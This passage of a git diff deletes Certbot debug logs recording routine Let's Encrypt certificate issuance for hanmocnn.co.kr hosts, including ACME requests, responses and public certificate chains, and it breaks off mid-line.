-gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h -J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha -qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8 -hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck -zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6 -nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4 -6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs -1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw -TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh -cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw -WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg -RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST -CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef -QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw -gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD -ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 -wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB -AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g -BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu -Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD -aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF -h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG -yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr -OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o -yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S -M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ -UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq -Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I -tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ -YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty -+VUwFj9tmWxyR/M= ------END CERTIFICATE----- - -2026-02-14 22:59:14,821:DEBUG:acme.client:Storing nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o -2026-02-14 22:59:14,821:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:14,826:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhYbEZ3X1RBQ3FHWjFvVFJWLVNLcmt6N3pKbDZYVmpvbktQQU9VUV83MW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1LzEifQ", - "signature": "sEsakd4hO8DFc3jDyP7m6Qx5z0Lbusnx8gMc9jh3fDtXm3fpnrj7zk2Gazi9IwMJ12iSd2p1MoEsmNDqwnpqr0INEJHYN6PLJEWwl_YWtaHzb8RbtXrVBEq7h-Ktz0mMJYsC64Pe8Nxm-TvVx6Uj_DwxNxswypZQP95rTjWhIkcK_xL_Bq2dWn1kTBr-rM76gvsbvlYdO2nsnaPqdheow62RxFXscm5F50ixvWiNxFACAC2u7bs9kRZGIumNcHf5_pREpgSuBlodFzpZ8n4cGJgouEafB4ZY6Fr2aTkXyb4_wBBhWvUwmCDHEwg4vE31WR-OHN-325DlYG5SvlUDnA", - "payload": "" -} -2026-02-14 22:59:14,988:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1 HTTP/1.1" 200 2344 -2026-02-14 22:59:14,988:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:14 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2344 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz -c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50 -LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89 -oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC -Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB -/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA -FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw -AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t -b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf -hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE -gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h -J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha -qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8 -hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck -zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6 -nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4 -6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs -1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL -MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo -IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN -MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j -cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ -vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF -HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw -DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS -BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA -gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm -MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww -CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu -b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX -lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb -Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf ------END CERTIFICATE----- - -2026-02-14 22:59:14,989:DEBUG:acme.client:Storing nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk -2026-02-14 22:59:14,990:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager -2026-02-14 22:59:14,990:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-2. -2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-2. -2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-2/cert.pem. -2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-2/privkey.pem. -2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-2/chain.pem. -2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-2/fullchain.pem. -2026-02-14 22:59:14,992:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-2/README. -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). -2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). -2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_map={'asset.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user). -2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: -Successfully received certificate. -Certificate is saved at: /etc/letsencrypt/live/npm-2/fullchain.pem -Key is saved at: /etc/letsencrypt/live/npm-2/privkey.pem -This certificate expires on 2026-05-15. -These files will be updated when the certificate renews. -2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: -2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. -2026-02-14 22:59:15,010:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: - * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate - * Donating to EFF: https://eff.org/donate-le diff --git a/npm/data/logs/letsencrypt.log.6 b/npm/data/logs/letsencrypt.log.6 deleted file mode 100644 index 20bf93f..0000000 --- a/npm/data/logs/letsencrypt.log.6 +++ /dev/null @@ -1,646 +0,0 @@ -2026-02-14 22:36:58,989:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-1', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'www.hanmocnn.co.kr'] -2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-14 22:36:59,006:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-14 22:36:59,007:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-14 22:36:59,008:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-14 22:36:59,320:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-14 22:36:59,323:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-14 22:36:59,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-14 22:36:59,895:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:36:59 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "oEbqUiTfyAY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-14 22:36:59,896:DEBUG:acme.client:Requesting fresh nonce -2026-02-14 22:36:59,896:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-14 22:37:00,072:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-14 22:37:00,072:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:36:59 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-14 22:37:00,073:DEBUG:acme.client:Storing nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0 -2026-02-14 22:37:00,073:DEBUG:acme.client:JWS payload: -b'{\n "contact": [\n "mailto:windpacer@hanmocnn.co.kr"\n ],\n "termsOfServiceAgreed": true\n}' -2026-02-14 22:37:00,081:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-acct: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAiandrIjogeyJuIjogInlsZkw4bmp6RXJhUUs3QmtYLUp2bkt0T3JSLVhsME9KMGpEQThHRmVQUG5jSHRnbkFwZlM5SktoM1U0eV9wbUg0aENqR05vUkZSSXEzRjE3Z0ZTRThPY3F3c0VYTWkzVjFOT2R6RU1TNmwzVTZWNW9jTWhSbFNFMHZ6azZsRHpZSlZGY2VKa0xZWjk1MmNhZ3JBc3RnNm05d0VHZXU3RnJRNm9GT3RwTm1nMW1vRmtWY09EWEFpVmRpbldRRGhyblJMQmJXdlRtd0ozRkYzUy1admJMTDdOUnFPSlVDdVFBU2RuWFFGNmRGcFdKbkRGd1dOeXYxR3k4Q0NhZlNrVl9EOEJiUm1SaGlKSXRLNFNUanRVZUhrNWRlVnJqWEpSS2Zfd2RoZ2VjaGVxVGtzVVpTZERTVXVLeVR0cDZFTUVkMHdpalQ0aXpPYXYyQVU2bGp1dmljUSIsICJlIjogIkFRQUIiLCAia3R5IjogIlJTQSJ9LCAibm9uY2UiOiAicUxQVHNkdGZTYjR4dUZ5SThBMWo4UFdSUW5CY2l5cHh0QlR2WmZkNU52cHZlRzlFNEkwIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctYWNjdCJ9", - "signature": "pML7yPmuF20tbvdpBRytdKGGQGUbsNmBY_eTnk8gIqeDcPEwBhchkw3nCgk1Btss3QEeKjdElfogjrlYd8bRiOn5DSM4FsyiuJkTtJX0j80l4XMQlPjzAuFYWskkNWmRoHCtgUKyO8hZ4YB7OLo31Eu4c-hzHl97-fcQ_fSt7ACx-jkJy0EVzvL0T4tZwWasPE4NOZ5FUCbLHgVi7NVs-rLA8o7DpVmWbS2GAi28bmfqHgeCwyMwfeZ_hbKv4wFhHe9ePgQ5Y3HFittE8W12UyC0dbs2oPZDvlmIaS1v2mtxfGpO6Z8I9uLHGSey2IE-DhdDw_cOkpnJiXKe2zrz4Q", - "payload": "ewogICJjb250YWN0IjogWwogICAgIm1haWx0bzp3aW5kcGFjZXJAaGFubW9jbm4uY28ua3IiCiAgXSwKICAidGVybXNPZlNlcnZpY2VBZ3JlZWQiOiB0cnVlCn0" -} -2026-02-14 22:37:00,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-acct HTTP/1.1" 201 477 -2026-02-14 22:37:00,328:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:00 GMT -Content-Type: application/json -Content-Length: 477 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="terms-of-service" -Location: https://acme-v02.api.letsencrypt.org/acme/acct/3064386906 -Replay-Nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "key": { - "kty": "RSA", - "n": "ylfL8njzEraQK7BkX-JvnKtOrR-Xl0OJ0jDA8GFePPncHtgnApfS9JKh3U4y_pmH4hCjGNoRFRIq3F17gFSE8OcqwsEXMi3V1NOdzEMS6l3U6V5ocMhRlSE0vzk6lDzYJVFceJkLYZ952cagrAstg6m9wEGeu7FrQ6oFOtpNmg1moFkVcODXAiVdinWQDhrnRLBbWvTmwJ3FF3S-ZvbLL7NRqOJUCuQASdnXQF6dFpWJnDFwWNyv1Gy8CCafSkV_D8BbRmRhiJItK4STjtUeHk5deVrjXJRKf_wdhgecheqTksUZSdDSUuKyTtp6EMEd0wijT4izOav2AU6ljuvicQ", - "e": "AQAB" - }, - "createdAt": "2026-02-14T22:37:00.200855652Z", - "status": "valid" -} -2026-02-14 22:37:00,328:DEBUG:acme.client:Storing nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0 -2026-02-14 22:37:00,344:DEBUG:certbot._internal.display.obj:Notifying user: Account registered. -2026-02-14 22:37:00,344:DEBUG:certbot._internal.main:Picked account: )>), contact=(), agreement=None, status='valid', terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service='https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf'), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))> -2026-02-14 22:37:00,345:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for www.hanmocnn.co.kr -2026-02-14 22:37:00,348:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-14 22:37:00,353:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZkRfZTFCem1kdUU3SkNnZHlJVGJ3a0xxZmtpRjAzVXVCS0NXclFqa3VuRzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "Mlj3TT4WmdvYZDh8uhxl04owClgR7elXmEmweyy7r-Vbvb3KRbbJRMt4so7IBeilHnTdZWWzWjsm2J_1Rc0wD4yYxGcVX4k6_rTEp1VLtXGvw4YCR7u1u-R5mXWi_Y63qgZiBn-ipdyddrnqZxQ7AduHn4pO76M2-bOtK3_6Xh9Ng9LLCRE3vdlqaVOhq9DgRYd6Ha5rPLcEx_h3l6kkknTch2JR7gnoAUKqtiJr43nCz9TD8WlJukSRB3aBjFt5FpryZG4os8euZsohgI78gr9w6Hx19ylUEJNpOUvJH_6nMtEZXBO3piEz9CRTJluj7w3Fokskx1-ECEQ7PiWVdw", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0" -} -2026-02-14 22:37:00,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352 -2026-02-14 22:37:00,655:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:00 GMT -Content-Type: application/json -Content-Length: 352 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976 -Replay-Nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-21T22:37:00Z", - "identifiers": [ - { - "type": "dns", - "value": "www.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976" -} -2026-02-14 22:37:00,655:DEBUG:acme.client:Storing nonce: qLPTsdtfk80m9uZOMtD94pI3q_mEC5u6q7OKcCUpnm2-R4pTzfo -2026-02-14 22:37:00,655:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:37:00,660:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zms4MG05dVpPTXREOTRwSTNxX21FQzV1NnE3T0tjQ1Vwbm0yLVI0cFR6Zm8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "EBACfPJ7VkN3vjihrLhDjxuplvbL6fQ8cKAkxjykdYkUCe-LRj7aQSloC1b8jPHcUwK-NjB682PVYP5DdFNgolvdhv9XrEocveAkITYWnkkE7LT0OoQs1ZkKjt796EuNguAhfrmzNmAJLAiTnNexapEcvgu9wrlyUJl7NP6f_W1jMjw0kSzQgbwdheUgnySv0vygHIg441deXaxSUmU1EsUIVUxPFCcbE0zzWNjHT0CHfr8sQkSUDVaWZuipRHE10KbLeCYsWeYTw--Pgc0VHd66DJVJRTjZ6idGwmKm5Md0LfAAzqzGLsY5rfGdpZuFG-2bVax4bZhpfCCXq5IvvQ", - "payload": "" -} -2026-02-14 22:37:00,838:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 826 -2026-02-14 22:37:00,839:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:37:00 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:37:00Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/_Sicnw", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/L-PpnQ", - "status": "pending", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo" - } - ] -} -2026-02-14 22:37:00,839:DEBUG:acme.client:Storing nonce: QkEzerAfss7X9qQyQnyeKwUBeoFBNPIiq6cM0QWaVf2-UORyscA -2026-02-14 22:37:00,839:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 